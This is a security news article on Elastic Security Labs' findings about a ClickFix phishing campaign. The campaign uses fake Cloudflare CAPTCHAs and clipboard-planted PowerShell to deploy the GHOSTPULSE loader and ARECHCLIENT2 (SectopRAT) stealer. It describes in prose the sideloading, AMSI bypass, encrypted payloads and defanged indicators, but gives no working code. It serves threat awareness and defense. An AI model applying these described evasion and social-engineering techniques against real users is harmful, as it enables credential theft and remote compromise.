Ddos 
Elastic Security Labs has revealed a highly sophisticated multi-stage attack chain exploiting a social engineering method dubbed ClickFix. This campaign leads to the deployment of the advanced GHOSTPULSE loader and the resurgent ARECHCLIENT2 (SectopRAT) malware, marking a concerning evolution in stealthy credential theft and remote access operations.
“ClickFix remains a highly effective and prevalent initial access method,” Elastic reports, warning of its widespread use in phishing attacks throughout 2024 and 2025.
First observed in 2024, ClickFix tricks users into initiating compromise themselves by copying and pasting malicious PowerShell commands into the Windows Run dialog. The user interaction is typically driven by a fake CAPTCHA or system error page that prompts the victim to execute a supposed “fix.”
“ClickFix leverages human psychology, transforming seemingly innocuous user interactions into the very launchpad for compromise,” Elastic explains.
Elastic’s telemetry shows a surge in ClickFix-related alerts, particularly during Q1 2025, with a clear rise in mass deployment of Remote Access Trojans (RATs) and InfoStealers.
Elastic observed a live campaign that begins with a phishing site disguised as a Cloudflare CAPTCHA. Behind the scenes, heavily obfuscated JavaScript copies a base64-encoded PowerShell command to the user’s clipboard, which when pasted and executed:
- Downloads a malicious ZIP file containing:
- A legitimate executable
- A malicious DLL
- Encrypted payloads
- Uses DLL sideloading to launch the GHOSTPULSE loader
- Decrypts and injects the final payload: ARECHCLIENT2, a stealthy .NET remote access trojan
“This particular attack chain demonstrates how adversaries combine social engineering with hidden loader capabilities and multiple execution layers,” the report writes.
GHOSTPULSE has been under continuous development since its emergence in 2023. In this campaign, it uses encrypted files like Shonomteak.bxi to extract its stage-two payloads, obfuscate configuration data, and evade detection via memory injection.
One innovation seen here is its use of IDAT headers in PNG images to hide encrypted code—showing how GHOSTPULSE evolves faster than traditional static detection methods.
“The malware decrypts the file using a DWORD addition operation… and injects it into a loaded library using the LibraryLoadA function.”
ARECHCLIENT2, also known as SectopRAT, is a heavily obfuscated .NET-based RAT and stealer. First documented in 2019, its resurgence is notable. The malware targets cryptocurrency wallets, browser data, autofill information, VPN credentials, messaging apps, and even gaming platforms like Steam.
Its deployment flow includes:
- AMSI bypass via API hooking
- Reflective .NET payload loading
- Decryption using embedded XOR routines
ARECHCLIENT2 connects to its command-and-control servers, executes remote commands, and exfiltrates credentials and system data.
Elastic’s analysis found hardcoded C2 infrastructure and evidence of dynamic server rotation, reverse proxies, and high turnover in infrastructure—signs of a well-maintained, actively managed botnet.
One fascinating angle in Elastic’s report is how attackers hijacked legitimate advertising infrastructure to host malicious payloads. Two domains, clients.dealeronlinemarketing[.]com and clients.contology[.]com, were identified as hosting the CAPTCHA lures.
“We assess that the attacker has likely compromised the server 50.57.243[.]90… exploiting the company’s infrastructure and advertising reach to facilitate widespread malicious activity.”
Related Posts:
- GHOSTPULSE Evolves: Malware Now Hides in Image Pixels, Evading Detection
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
- ClickFix: The Rising Threat of Clipboard-Based Social Engineering
- Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique
Donate